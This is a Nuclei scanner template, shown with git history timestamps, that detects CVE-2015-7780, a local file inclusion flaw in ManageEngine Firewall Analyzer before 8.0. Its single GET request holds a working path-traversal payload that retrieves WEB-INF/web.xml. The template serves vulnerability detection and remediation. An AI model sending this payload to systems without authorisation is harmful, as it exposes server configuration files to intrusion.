nuclei-templates/http/cves/2015/CVE-2015-7780.yaml

51 lines
1.4 KiB
YAML
Raw Normal View History

2021-09-20 13:55:31 +00:00
id: CVE-2015-7780
info:
name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion
2021-09-20 13:55:31 +00:00
author: daffainfo
severity: medium
description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability.
2021-09-20 13:55:31 +00:00
reference:
- https://www.exploit-db.com/exploits/35933
- http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html
- http://jvn.jp/en/jp/JVN21968837/index.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-7780
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2015-7780
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.00151
2023-08-31 11:46:18 +00:00
epss-percentile: 0.50657
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: zohocorp
product: manageengine_firewall_analyzer
tags: manageengine,edb,cve,cve2015,lfi
2021-09-20 13:55:31 +00:00
http:
2021-09-20 13:55:31 +00:00
- method: GET
path:
- "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-09-20 13:55:31 +00:00
words:
- "</web-app>"
- "java.sun.com"
condition: and
- type: word
part: header
words:
- "application/xml"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200